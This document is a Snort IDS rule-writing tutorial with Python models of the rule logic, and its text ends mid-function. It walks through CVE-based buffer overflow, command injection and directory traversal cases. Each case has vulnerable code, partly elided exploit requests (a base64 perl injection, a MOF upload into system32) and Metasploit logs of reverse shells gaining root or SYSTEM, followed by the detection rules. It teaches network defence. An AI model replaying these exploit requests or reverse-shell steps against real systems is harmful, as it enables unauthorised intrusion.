Introduction to Snort Rule Writing

Page 1: Introduction to Snort Rule Writing

Introduction to Snort Rule Writing

Page 2: Introduction to Snort Rule Writing

Snort Rule Syntax

# rule header
alert tcp any any -> 192.168.1.0/24 111 (

rule action    alert
protocol       tcp
src address    any
src port       any
dst address    192.168.1.0/24
dst port       111

Page 3: Introduction to Snort Rule Writing

Snort Rule Syntax

# rule option format
alert tcp any any -> 192.168.1.0/24 111 (
    msg:"Rule Message"; \

rule option             msg
rule option argument    "Rule Message"

Page 4: Introduction to Snort Rule Writing

rule option: content

# content match example
alert tcp any any -> 192.168.1.0/24 111 (
    content:"ABCD"; \
    # is equivalent to:
    content:"|41 42 43 44|"; \

The content match finds a static pattern in network data.

Page 5: Introduction to Snort Rule Writing

content modifiers: nocase

# content match modifiers: nocase
alert tcp any any -> 192.168.1.0/24 111 (
    # match "ABCD" or "abcd" etc.
    content:"ABCD"; nocase;

nocase makes a content match case insensitive. content matches are case sensitive by default.

Page 6: Introduction to Snort Rule Writing

content modifiers: offset

# content match modifiers: offset
alert tcp any any -> 192.168.1.0/24 111 (
    # skip 2 bytes before searching for "ABCD"
    content:"ABCD"; offset:2;

offset requires the match to occur after the designated offset in network data.

Page 7: Introduction to Snort Rule Writing

content modifiers: depth

# content match modifiers: depth
alert tcp any any -> 192.168.1.0/24 111 (
    # match "ABCD" within the first 4 bytes of the payload
    content:"ABCD"; depth:4;

depth restricts how far Snort should search for the specified pattern.

Page 8: Introduction to Snort Rule Writing

content modifiers: distance

# content match modifiers: distance
alert tcp any any -> 192.168.1.0/24 111 (
    # find "DEF" 1 byte after "ABC"
    content:"ABC"; content:"DEF"; distance:1;

distance specifies how far into a payload Snort should ignore before starting to search for the specified pattern, relative to the end of the previous pattern match.

Page 9: Introduction to Snort Rule Writing

content modifiers: within

# content match modifiers: within
alert tcp any any -> 192.168.1.0/24 111 (
    # find "EFG" within 10 bytes of "ABC"
    content:"ABC"; content:"EFG"; within:10;

within makes sure that at most N bytes are between pattern matches.

Page 10: Introduction to Snort Rule Writing

negated content match

# negated content match
alert tcp any any -> 192.168.1.0/24 111 (
    # make sure "EFG" is NOT within 10 bytes of "ABC"
    content:"ABC"; content:!"EFG"; within:10;

content matches can be negated.
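The six content examples above (nocase, offset, depth, distance, within and negation) can be tried on constructed payloads with the small model below. It is an added illustration, not Snort's matcher or code from this deck: it reproduces only the documented behaviour of each modifier (offset and depth count from the start of the payload, distance and within from the end of the previous match, and a negated content succeeds when its pattern is absent).

```python
# Toy model of Snort content-modifier semantics (nocase, offset, depth,
# distance, within, negation), added to illustrate the slides above.
# This is not Snort's matcher; it only reproduces the documented behaviour
# of each modifier so the examples can be tried on constructed payloads.

def content_match(payload, pattern, *, nocase=False, offset=0, depth=None,
                  distance=None, within=None, negated=False, cursor=0):
    """Evaluate one content option. Returns (matched, new_cursor).

    cursor is the byte just past the previous content match; distance and
    within are measured from it, offset and depth from the payload start.
    """
    hay, needle = (payload.lower(), pattern.lower()) if nocase else (payload, pattern)

    if distance is not None or within is not None:
        start = cursor + (distance or 0)                       # skip `distance` bytes after the last match
        end = len(hay) if within is None else start + within   # whole match must end by here
    else:
        start = offset                                         # skip `offset` bytes from payload start
        end = len(hay) if depth is None else offset + depth    # search only `depth` bytes

    pos = hay.find(needle, start, end)
    if negated:
        # a negated content succeeds when the pattern is absent; the cursor is not moved
        return pos == -1, cursor
    if pos == -1:
        return False, cursor
    return True, pos + len(needle)


def check_contents(payload, contents):
    """Evaluate a list of content options in rule order, threading the cursor."""
    cursor = 0
    for opts in contents:
        ok, cursor = content_match(payload, cursor=cursor, **opts)
        if not ok:
            return False
    return True


# The content options from the slides, written as option lists
NOCASE   = [dict(pattern="ABCD", nocase=True)]
OFFSET   = [dict(pattern="ABCD", offset=2)]
DEPTH    = [dict(pattern="ABCD", depth=4)]
DISTANCE = [dict(pattern="ABC"), dict(pattern="DEF", distance=1)]
WITHIN   = [dict(pattern="ABC"), dict(pattern="EFG", within=10)]
NEGATED  = [dict(pattern="ABC"), dict(pattern="EFG", within=10, negated=True)]

if __name__ == "__main__":
    # constructed payloads: (rule, payload, expected result)
    cases = [
        (NOCASE,   "xxabcd",                True),
        (OFFSET,   "ABCDxx",                False),  # ABCD starts before byte 2
        (DEPTH,    "xABCD",                 False),  # ABCD ends past byte 4
        (DISTANCE, "ABCDEF",                False),  # no gap between ABC and DEF
        (WITHIN,   "ABC" + "." * 8 + "EFG", False),  # EFG would end 11 bytes after ABC, window is 10
        (NEGATED,  "ABC..EFG",              False),  # EFG present, so the negation fails
    ]
    for rule, payload, expected in cases:
        assert check_contents(payload, rule) == expected
        print(f"{payload!r:24} -> {check_contents(payload, rule)}")
```

The same option list can be evaluated against any payload; the cursor threading is what makes distance and within relative to the previous match rather than to the packet start.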

Page 11: Introduction to Snort Rule Writing

content buffers

# content buffer example
alert tcp any any -> 192.168.1.0/24 111 (
    # match "ABC" within the HTTP URI
    content:"ABC"; http_uri;

content matches can be restricted to a payload location, such as the HTTP URI.

Page 12: Introduction to Snort Rule Writing

content buffers

POST /index.php HTTP/1.1
Host: example.com
Content-Length: 28
Content-Type: application/x-www-form-urlencoded
Cookie: this_is_a_cookie=this_is_its_value

firstparam=one&secondparam=two

Buffers:
    http_method         POST
    http_uri            /index.php
    http_header         the request header lines
    http_cookie         this_is_a_cookie=this_is_its_value
    http_client_body    firstparam=one&secondparam=two
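As an added illustration of the buffers listed above (not Snort's HTTP inspector and not code from this deck), the splitter below cuts a raw request into the pieces that http_method, http_uri, http_header, http_cookie and http_client_body inspect, so a content match can be tried against one buffer at a time. It assumes the Cookie line is kept out of http_header, as Snort does when cookie extraction is enabled, and it does no normalization of any buffer.

```python
# Added illustration of the HTTP buffers named on the slide. It splits a raw
# request into the pieces that Snort's http_method, http_uri, http_header,
# http_cookie and http_client_body options inspect. It is not Snort's HTTP
# inspector: Snort also normalizes these buffers (e.g. percent-decoding the
# URI), which this splitter does not do, and it assumes the Cookie header is
# removed from http_header, as Snort does when cookie extraction is enabled.

def split_http_request(raw):
    """Return a dict of buffer name -> content for one raw HTTP request."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, uri, _version = request_line.split(" ", 2)

    headers, cookie = [], ""
    for line in header_lines:
        name, _, value = line.partition(":")
        if name.strip().lower() == "cookie":
            cookie = value.strip()          # http_cookie holds only the cookie value
        else:
            headers.append(line)
    return {
        "http_method": method,
        "http_uri": uri,
        "http_header": "\r\n".join(headers),
        "http_cookie": cookie,
        "http_client_body": body,
    }


def content_in_buffer(buffers, pattern, buffer_name, nocase=False):
    """content:"<pattern>"; <buffer_name>; [nocase;] evaluated on the split request."""
    hay = buffers[buffer_name]
    return (pattern.lower() in hay.lower()) if nocase else (pattern in hay)


# Constructed request mirroring the slide (Content-Length computed for this body)
SAMPLE_REQUEST = (
    "POST /index.php HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "Content-Length: 30\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: this_is_a_cookie=this_is_its_value\r\n"
    "\r\n"
    "firstparam=one&secondparam=two"
)

if __name__ == "__main__":
    bufs = split_http_request(SAMPLE_REQUEST)
    for name, value in bufs.items():
        print(f"{name:17}: {value!r}")
    # the same pattern restricted to different buffers
    print(content_in_buffer(bufs, "secondparam", "http_client_body"))  # True
    print(content_in_buffer(bufs, "secondparam", "http_uri"))          # False
```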

Page 13: Introduction to Snort Rule Writing

content modifiers: fast_pattern

# fast_pattern example
alert tcp any any -> 192.168.1.0/24 111 (
    # set "ABC" as the rule fast_pattern
    content:"ABC"; fast_pattern;

fast_pattern explicitly specifies the content match within a rule to be used with the fast pattern matcher. The fast_pattern serves as the "entrance" condition for rule evaluation.

Page 14: Introduction to Snort Rule Writing

content modifiers: fast_pattern

# fast_pattern:only; example
alert tcp any any -> 192.168.1.0/24 111 (
    # set "ABC" as the rule fast_pattern
    content:"ABC"; fast_pattern:only;

fast_pattern:only; selects the content match to be used in the fast pattern matcher for the rule and also specifies that this match will not be evaluated again when the rule "enters".

Page 15: Introduction to Snort Rule Writing

rule option: pcre

# pcre rule option example
alert tcp any any -> 192.168.1.0/24 111 (
    # match the following regex
    pcre:"/A[BC]D/i"; \

pcre declares a Perl compatible regular expression for matching on payload data. Flags can be specified after the closing slash, e.g. /i for case insensitivity.

Page 16: Introduction to Snort Rule Writing

Traffic Triage and Isolation

Figure: a triage funnel. Normal Traffic is narrowed by the fast_pattern to Vulnerable Application Traffic, then by content matches (etc.) to Vulnerable Parameter Traffic, then by pcre to the Vulnerability Condition. Axes: Traffic Volume (decreasing down the funnel), Speed (Fast at the fast_pattern stage, Slow at the pcre stage), Traffic Type.

Page 17: Introduction to Snort Rule Writing

Detection Strategies

Page 18: Introduction to Snort Rule Writing

Detection Topics

> Buffer Overflow
  Command Injection
  Directory Traversal
  Use-After-Free
  Remote File Include
  Browser Plugins
  Cross Site Scripting
  Malware Command Traffic

Page 19: Introduction to Snort Rule Writing

Buffer Overflow Overview

Stack buffer overflow in AVM Fritz!Box daemon dsl_control.

AVM Fritz!Box firmware fails to check the length of user supplied data in a 'se' or ScriptExecute command sent in a SOAP request to the dsl_control daemon.

Page 20: Introduction to Snort Rule Writing

Buffer Overflow Overview

dsl_cpi_cli_access.c registers the command 'se' to the DSL_CPE_CLI_ScriptExecute handler function:

[...]
DSL_CPE_CLI_CMD_ADD_COMM (
    "se", "ScriptExecute", DSL_CPE_CLI_ScriptExecute, g_sSe);
[...]

Page 21: Introduction to Snort Rule Writing

Buffer Overflow Overview

DSL_CLI_LOCAL DSL_int_t DSL_CPE_CLI_ScriptExecute([...])
{
    [...]
    DSL_char_t sFileName[DSL_MAX_COMMAND_LINE_LENGTH] = {0};

    if (DSL_CPE_CLI_CheckParamNumber(pCommands, 1, DSL_CLI_EQUALS) == DSL_FALSE)
    {
        return -1;
    }

    DSL_CPE_sscanf(pCommands, "%s", sFileName);
    [...]

Page 22: Introduction to Snort Rule Writing

Buffer Overflow Overview

The code calls the function DSL_CPE_sscanf in order to copy the value of the parameter pCommands to the local character array sFileName without restriction or bounds checking. The size of the vulnerable stack buffer is 256 bytes as indicated in dsl_cpi_cli_console.h:

#define DSL_MAX_COMMAND_LINE_LENGTH 256

Triggering the vulnerability is then a simple matter of sending >256 bytes in the first 'se' parameter.

Page 23: Introduction to Snort Rule Writing

Buffer Overflow Exploit

<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ifx="urn:dsl_api">
  <SOAP-ENV:Body>
    <ifx:DslCpeCliAccess>
      <command>se "A"*300</command>
    </ifx:DslCpeCliAccess>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Page 24: Introduction to Snort Rule Writing

Buffer Overflow Detection

# vulnerable SOAP request
# with at least 256 bytes
# within <command></command>
#
content:"DslCpeCliAccess"; fast_pattern:only; http_client_body; \
content:"<command"; nocase; http_client_body; \
isdataat:256,relative; \
content:!"</command"; nocase; within:256; http_client_body; \

# stack buffer overflow (>256 bytes)
# within param0: <command> se param0 </command>
#
pcre:"/<command[^>]*?>\s*se\s[^<]{256}/Pi"; \

Page 25: Introduction to Snort Rule Writing

Buffer Overflow Detection

alert tcp $EXTERNAL_NET any -> $HOME_NET 8080 ( \
    msg:"SERVER-WEBAPP AVM FritzBox dsl_control stack buffer overflow attempt"; \
    flow:to_server,established; \
    content:"DslCpeCliAccess"; fast_pattern:only; http_client_body; \
    content:"<command"; nocase; http_client_body; \
    isdataat:256,relative; \
    content:!"</command"; within:256; nocase; http_client_body; \
    pcre:"/<command[^>]*?>\s*se\s[^<]{256}/Pi"; \
    metadata:policy security-ips drop, service http; \
    classtype:attempted-admin; \
)
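To see how the body options of the rule above work together (the fast pattern, the "<command" anchor, isdataat:256,relative, the negated "</command" within 256 bytes, and the final pcre), the model below runs them in order over constructed SOAP bodies. It is an added example, not Snort's engine and not code from this deck; Python's re stands in for PCRE and the SOAP envelope is constructed in the shape shown on the exploit slide. The padded case is included to show that the negated content, not only isdataat, is what rejects a short parameter followed by more data.

```python
import re

# Added example: the Page 25 rule's body checks re-implemented in Python so
# they can be run against constructed SOAP bodies. This models the rule
# options; it is not Snort's engine, and Python's re is used in place of PCRE.

FRITZBOX_PCRE = re.compile(r"<command[^>]*?>\s*se\s[^<]{256}", re.IGNORECASE)  # /Pi


def fritzbox_overflow_match(body):
    """Return True if the HTTP client body satisfies every option of the rule."""
    if "DslCpeCliAccess" not in body:                 # content; fast_pattern:only
        return False
    low = body.lower()
    pos = low.find("<command")                        # content:"<command"; nocase
    if pos == -1:
        return False
    cursor = pos + len("<command")
    if len(body) - cursor < 256:                      # isdataat:256,relative
        return False
    if "</command" in low[cursor:cursor + 256]:       # content:!"</command"; within:256
        return False
    return FRITZBOX_PCRE.search(body) is not None     # pcre: "se " then 256 non-'<' bytes


def soap_body(command):
    """Constructed SOAP envelope in the shape shown on the exploit slide."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"'
        ' xmlns:ifx="urn:dsl_api"><SOAP-ENV:Body><ifx:DslCpeCliAccess>'
        f"<command>{command}</command>"
        "</ifx:DslCpeCliAccess></SOAP-ENV:Body></SOAP-ENV:Envelope>"
    )


OVERSIZED = soap_body("se " + "A" * 300)          # > 256 byte parameter, as on the slide
NORMAL    = soap_body("se script.txt")            # short parameter: isdataat fails
# short parameter followed by enough trailing data to satisfy isdataat;
# the negated "</command" check is what rejects this one
PADDED    = soap_body("se script.txt") + " " * 400

if __name__ == "__main__":
    for name, body in (("oversized", OVERSIZED), ("normal", NORMAL), ("padded", PADDED)):
        print(f"{name:9}: {fritzbox_overflow_match(body)}")
```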

Page 27: Introduction to Snort Rule Writing

Detection Topics

  Buffer Overflow
> Command Injection
  Directory Traversal
  Use-After-Free
  Remote File Include
  Browser Plugins
  Cross Site Scripting
  Malware Command Traffic

Page 28: Introduction to Snort Rule Writing

Command Injection Overview

CVE-2014-3805

Command injection vulnerabilities in AlienVault OSSIM av-centerd, which accepts SOAP commands on port 40007.

SOAP command 'get_log_line' parameter '$number_lines' and 'get_license' parameter '$license_type' are used in OS commands without sanitization.

Page 29: Introduction to Snort Rule Writing

Command Injection Overview

/usr/share/alienvault-center/lib/AV/CC/Util.pm

sub get_log_line() {
    my ( $function_llamada, $name, $uuid, $admin_ip,
         $hostname, $r_file, $number_lines ) = @_;
    [...]
    # $number_lines used in OS command without sanitization
    my $command = "tail -$number_lines $r_file";
    my @content = `$command`;
    [...]
}

Page 30: Introduction to Snort Rule Writing

Command Injection Overview

/usr/share/alienvault-center/lib/AV/CC/Util.pm

sub get_license() {
    my ( $function_llamada, $name, $uuid, $admin_ip,
         $hostname, $license, $license_type ) = @_;
    [...]
    # $license_type used in OS command without sanitization
    my $package = system ("curl --proxy-anyauth -K /etc/curlrc
        http://[...]/avl/$license_type/[...]");
}

Page 31: Introduction to Snort Rule Writing

Command Injection Exploit

POST /av-centerd HTTP/1.1
Host: 172.16.8.223:40007
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 765
Content-Type: text/xml; charset=utf-8
SOAPAction: "AV/CC/Util#get_log_line"

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope soap:encodingStyle[...]>
  <soap:Body>
    <get_log_line xmlns="AV/CC/Util">
      <c-gensym3 xsi:type="xsd:string">All[...]</c-gensym3>
      <c-gensym13 xsi:type="xsd:string">&amp;&amp; perl -MMIME::Base64 -e &apos;system(decode_base64(&quot;cGVy[...]</c-gensym13>
    </get_log_line>
  </soap:Body>
</soap:Envelope>


Page 33: Introduction to Snort Rule Writing

Command Injection Exploit

msf exploit(alienvault_centerd_soap_exec) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Command shell session 1 opened (172.16.158.1:4444 -> 172.16.158.173:41320) at 2014-07-19 12:09:00 -0500

id
uid=0(root) gid=0(root) groups=0(root)

remember traffic isolation...

Page 34: Introduction to Snort Rule Writing

Command Injection Detection

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( \
    msg:"SERVER-WEBAPP AlienVault OSSIM get_log_line command injection attempt"; \
    flow:to_server,established; \
    content:"/av-centerd"; nocase; http_uri; \
    content:"<get_log_line"; fast_pattern; nocase; http_client_body; \
    content:"xsd:string"; distance:0; nocase; http_client_body; \
    pcre:"/xsd\x3astring[^>]*?>[^<]*?([\x3b\x7c\x26\x60]|\x24\x28)/Pi"; \
    metadata:service http; \
    reference:cve,2014-3805; \
    classtype:attempted-admin; \
)

Page 35: Introduction to Snort Rule Writing

Command Injection Detection

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( \
    msg:"SERVER-WEBAPP AlienVault OSSIM get_license command injection attempt"; \
    flow:to_server,established; \
    content:"/av-centerd"; nocase; http_uri; \
    content:"<get_license"; fast_pattern; nocase; http_client_body; \
    content:"xsd:string"; distance:0; nocase; http_client_body; \
    pcre:"/xsd\x3astring[^>]*?>[^<]*?([\x3b\x7c\x26\x60]|\x24\x28)/Pi"; \
    metadata:service http; \
    reference:cve,2014-3805; \
    classtype:attempted-admin; \
)
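The two AlienVault rules above differ only in the method tag they anchor on; the model below runs their option sequence (URI content, method tag as fast pattern, xsd:string after it, then the shared pcre) over constructed SOAP bodies. It is an added example and not Snort's engine or code from this deck; Python's re replaces PCRE and the envelope is constructed in the shape of the exploit slide. One detail worth noticing: the exploit body on the slide starts its value with "&amp;&amp;", and the leading "&" of that XML entity is itself the \x26 the pcre's character class looks for, so no entity decoding is needed for the rule to fire.

```python
import re

# Added example: the get_log_line / get_license rules from the slides above,
# modelled in Python and run over constructed SOAP bodies. Python's re stands
# in for PCRE; the content cursor is threaded by hand. Not Snort's engine.

OSSIM_PCRE = re.compile(
    r"xsd\x3astring[^>]*?>[^<]*?([\x3b\x7c\x26\x60]|\x24\x28)",  # ; | & ` or $(
    re.IGNORECASE)


def ossim_injection_match(uri, body, method="get_log_line"):
    """Model the rule: URI content, method tag, xsd:string after it, then the pcre."""
    if "/av-centerd" not in uri.lower():              # content:"/av-centerd"; nocase; http_uri
        return False
    low = body.lower()
    tag = f"<{method}".lower()
    pos = low.find(tag)                               # content:"<get_log_line"; fast_pattern; nocase
    if pos == -1:
        return False
    cursor = pos + len(tag)
    if low.find("xsd:string", cursor) == -1:          # content:"xsd:string"; distance:0
        return False
    return OSSIM_PCRE.search(body) is not None        # pcre .../Pi (whole body, no R flag)


def soap_body(method, *values):
    """Constructed envelope in the shape shown on the exploit slide."""
    params = "".join(
        f'<c-gensym{i} xsi:type="xsd:string">{v}</c-gensym{i}>'
        for i, v in enumerate(values, 3))
    return ('<?xml version="1.0" encoding="UTF-8"?><soap:Envelope><soap:Body>'
            f'<{method} xmlns="AV/CC/Util">{params}</{method}></soap:Body></soap:Envelope>')


# As on the slide, the injected value starts with "&amp;&amp;"; the leading "&"
# of the XML entity is the \x26 the character class looks for.
EXPLOIT_LOG     = soap_body("get_log_line", "All", "&amp;&amp; perl -e ...")
NORMAL_LOG      = soap_body("get_log_line", "All", "50")          # a plain line count
EXPLOIT_LICENSE = soap_body("get_license", "free$(id)")           # the $( alternative

if __name__ == "__main__":
    print(ossim_injection_match("/av-centerd", EXPLOIT_LOG))                            # True
    print(ossim_injection_match("/av-centerd", NORMAL_LOG))                             # False
    print(ossim_injection_match("/av-centerd", EXPLOIT_LICENSE, method="get_license"))  # True
```

Because the pcre searches the whole body rather than continuing from the content cursor (no R flag), the first xsd:string parameter with a harmless value does not stop the regex; it simply moves on to the next occurrence.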

Page 36: Introduction to Snort Rule Writing

Command Injection Overview

CVE-2014-5073

OS command injection vulnerability in VMTurbo Operations Manager vmtadmin.cgi parameter 'fileDate'.

If the 'callType' parameter is set to "DOWN" vmtadmin.cgi will pass the value of 'fileDate' to system().

Page 37: Introduction to Snort Rule Writing

Command Injection Overview

my $actiontype = $query->param("actionType");
my $calltype   = $query->param("callType");
my $filedate   = $query->param("fileDate");
my $statusfile = (defined $filedate) ? $filedate : $mon.".".$mday." [...]
[...]
elseif ($calltype eq "DOWN") {
    [...]
    system("rm \"$upload_dir$statusfile\"");
    [...]

Page 38: Introduction to Snort Rule Writing

Command Injection Exploit

GET /cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP&fileDate=%22%60printf%20%27\177\105\114[...] HTTP/1.1
Host: 172.16.41.140
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


Page 40: Introduction to Snort Rule Writing

Command Injection Exploit

msf exploit(vmturbo_vmtadmin_exec_noauth) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Command shell session 1 opened (172.16.158.1:4444 -> 172.16.158.173:41320) at 2014-07-19 12:09:00 -0500

id
uid=0(root) gid=0(root) groups=0(root)

Page 41: Introduction to Snort Rule Writing

Command Injection Detection

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( \
    msg:"SERVER-WEBAPP VMTurbo vmtadmin.cgi command injection attempt"; \
    flow:to_server,established; \
    content:"/cgi-bin/vmtadmin.cgi"; fast_pattern:only; http_uri; \
    content:"callType=DOWN"; nocase; http_uri; \
    content:"fileDate="; nocase; http_uri; \
    pcre:"/[?&]fileDate=[^&]*?([\x60\x3b\x7c]|[\x3c\x3e\x24]\x28)/Ui"; \
    metadata:policy security-ips drop, service http; \
    reference:cve,2014-5073; \
    classtype:attempted-admin; \
)

Start by isolating traffic.

Page 42: Introduction to Snort Rule Writing

Command Injection Detection

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( \
    msg:"SERVER-WEBAPP VMTurbo vmtadmin.cgi command injection attempt"; \
    flow:to_server,established; \
    content:"/cgi-bin/vmtadmin.cgi"; fast_pattern:only; http_uri; \
    content:"callType=DOWN"; nocase; http_uri; \
    content:"fileDate="; nocase; http_raw_uri; \
    content:"%26"; distance:0; http_raw_uri; \
    pcre:"/[?&]fileDate=[^&]*?%26/Ii"; \
    metadata:policy security-ips drop, service http; \
    reference:cve,2014-5073; \
    classtype:attempted-admin; \
)
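The two VMTurbo rules above inspect different buffers: the first works on the normalized URI (http_uri, pcre /U), the second on the raw URI (http_raw_uri, pcre /I) and looks for a percent-encoded ampersand. The added model below runs both variants over constructed URIs so the difference is visible. It is not Snort's HTTP inspector or code from this deck; URI normalization is approximated by a single percent-decoding pass and Python's re stands in for PCRE.

```python
import re
from urllib.parse import unquote

# Added example comparing the two VMTurbo rule variants above. The first
# inspects the normalized URI (pcre /U, http_uri), the second the raw URI
# (pcre /I, http_raw_uri). Snort's URI normalization is approximated here by a
# single percent-decoding pass; this is a model, not Snort's HTTP inspector.

NORMALIZED_PCRE = re.compile(
    r"[?&]fileDate=[^&]*?([\x60\x3b\x7c]|[\x3c\x3e\x24]\x28)", re.IGNORECASE)  # ` ; | <( >( $(
RAW_PCRE = re.compile(r"[?&]fileDate=[^&]*?%26", re.IGNORECASE)               # encoded '&'


def normalize_uri(raw_uri):
    """Approximation of the http_uri buffer: percent-decode the raw URI once."""
    return unquote(raw_uri)


def _common_contents(uri):
    low = uri.lower()
    return "/cgi-bin/vmtadmin.cgi" in low and "calltype=down" in low


def vmtadmin_match_normalized(raw_uri):
    """Page 41 variant: every check runs on the normalized URI."""
    uri = normalize_uri(raw_uri)
    if not _common_contents(uri) or "filedate=" not in uri.lower():
        return False
    return NORMALIZED_PCRE.search(uri) is not None


def vmtadmin_match_raw(raw_uri):
    """Page 42 variant: fileDate= and %26 are looked for in the raw URI."""
    if not _common_contents(normalize_uri(raw_uri)):
        return False
    low_raw = raw_uri.lower()
    pos = low_raw.find("filedate=")                                # content:"fileDate="; http_raw_uri
    if pos == -1 or low_raw.find("%26", pos + len("filedate=")) == -1:  # content:"%26"; distance:0
        return False
    return RAW_PCRE.search(raw_uri) is not None


# Constructed URIs: the slide's request (truncated), a value carrying an encoded
# ampersand, and a benign date value
SLIDE_URI   = r"/cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP&fileDate=%22%60printf%20%27\177\105\114"
ENCODED_AMP = "/cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP&fileDate=x%26y"
BENIGN_URI  = "/cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP&fileDate=2014-07-19"

if __name__ == "__main__":
    for uri in (SLIDE_URI, ENCODED_AMP, BENIGN_URI):
        print(vmtadmin_match_normalized(uri), vmtadmin_match_raw(uri), uri)
```

In the decoded buffer the %26 becomes a literal "&", which ends the [^&]*? run before any of the first pcre's metacharacters is seen; the raw-URI variant sees the three bytes "%26" exactly as sent. The two variants therefore cover different cases rather than one replacing the other.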

Page 44: Introduction to Snort Rule Writing

Detection Topics

  Buffer Overflow
  Command Injection
> Directory Traversal
  Use-After-Free
  Remote File Include
  Browser Plugins
  Cross Site Scripting
  Malware Command Traffic

Page 45: Introduction to Snort Rule Writing

Directory Traversal Overview

CVE-2014-2424

Directory traversal vulnerability in Oracle Event Processing. FileUploadServlet function processUploadedFile() fails to properly sanitize the filename parameter value.

The WMI service can be abused to convert the file upload into remote code execution without user interaction.

Page 46: Introduction to Snort Rule Writing

Directory Traversal Overview

private void processUploadedFile(FileItem paramFileItem)
{
    try {
        // paramFileItem.getName() used to
        // create file without verification
        paramFileItem.write(new File(this.uploadLocation,
                                     paramFileItem.getName()));
    } catch (Exception localException) { [...] }
}

Page 47: Introduction to Snort Rule Writing

Directory Traversal Exploit

POST /wlevs/visualizer/upload HTTP/1.1
Host: 172.16.8.29:9002
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_732_2993821416_1334322828
Content-Length: 2658

--_Part_732_2993821416_1334322828
Content-Disposition: form-data; name="uploadfile"; filename="../../../../../../../WINDOWS/system32/wbem/mof/klIvousnq.mof"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

#pragma namespace("\\\\.\\root\\cimv2") [...]


Page 49: Introduction to Snort Rule Writing

Directory Traversal Exploit

msf exploit(oracle_event_processing_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.198:9002 - Generating payload and mof file...
[*] 172.16.158.198:9002 - Uploading the exe payload hENIwUPM.exe...
[*] 172.16.158.198:9002 - Uploading the MOF file klIvousnq.mof
[*] Sending stage (769536 bytes) to 172.16.158.198
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.198:1052) at 2014-06-29 15:42:37 -0500
[+] Deleted wbem/mof/klIvousnq.mof
[!] This exploit may require manual cleanup of 'hENIwUPM.exe' on the target

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Page 50: Introduction to Snort Rule Writing

Directory Traversal Detection

#
# Multipart POST
#
content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; \
content:"filename"; nocase; http_client_body; \
content:"Content-Disposition"; nocase; http_client_body; \
pcre:"/filename\s*=\s*[^\r\n]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pi"; \

#
# Urlencoded POST
#
content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; \
content:"filename="; nocase; http_client_body; \
pcre:"/(^|&)filename=[^&]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pim"; \

Page 51: Introduction to Snort Rule Writing

Directory Traversal Detection

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( \
    msg:"SERVER-WEBAPP Oracle Event Processing directory traversal attempt"; \
    flow:to_server,established; \
    content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; \
    content:"filename"; nocase; http_client_body; \
    content:"Content-Disposition"; nocase; http_client_body; \
    pcre:"/filename\s*=\s*[^\r\n]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pi"; \
    metadata:policy balanced-ips drop, policy security-ips drop, service http; \
    reference:cve,2014-2424; \
    classtype:attempted-admin; \
)

Page 52: Introduction to Snort Rule Writing

Directory Traversal Detection

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( \
    msg:"SERVER-WEBAPP Oracle Event Processing directory traversal attempt"; \
    flow:to_server,established; \
    content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; \
    content:"filename="; nocase; http_client_body; \
    pcre:"/(^|&)filename=[^&]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pim"; \
    metadata:policy balanced-ips drop, policy security-ips drop, service http; \
    reference:cve,2014-2424; \
    classtype:attempted-admin; \
)
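The multipart and urlencoded rules above share the same dot-dot-slash pattern but anchor it differently (a Content-Disposition line versus a parameter at the start of the body or after an ampersand, hence the /m flag on the second pcre). The added model below applies both variants to constructed bodies; it is not Snort's engine or code from this deck, and Python's re stands in for PCRE. A filename containing dots and a slash but no "../" sequence is included to show that the pattern requires the two dots to be immediately followed by a separator.

```python
import re

# Added example: the two Oracle Event Processing rule variants above (multipart
# and urlencoded POST bodies) modelled in Python over constructed bodies.
# Python's re replaces PCRE; /P is the client body, /i ignore case, /m multiline.

MULTIPART_PCRE = re.compile(
    r"filename\s*=\s*[^\r\n]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)", re.IGNORECASE)
URLENCODED_PCRE = re.compile(
    r"(^|&)filename=[^&]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)", re.IGNORECASE | re.MULTILINE)


def traversal_match(uri, body):
    """Return which rule variant fires ('multipart' or 'urlencoded') or None."""
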